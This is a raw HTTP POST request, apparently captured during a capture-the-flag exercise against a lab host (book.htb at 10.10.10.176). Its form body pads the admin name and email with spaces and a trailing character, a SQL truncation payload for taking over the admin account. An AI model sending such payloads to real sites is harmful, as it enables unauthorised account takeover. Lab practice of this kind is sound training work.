POST /index.php HTTP/1.1

Host: 10.10.10.176

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://10.10.10.176/index.php

Content-Type: application/x-www-form-urlencoded

Content-Length: 57

Connection: close

Cookie: PHPSESSID=q7bqg1gipvobq3ict7k46un8rs

Upgrade-Insecure-Requests: 1



name=admin      a&email=admin%40book.htb      a&password=admin
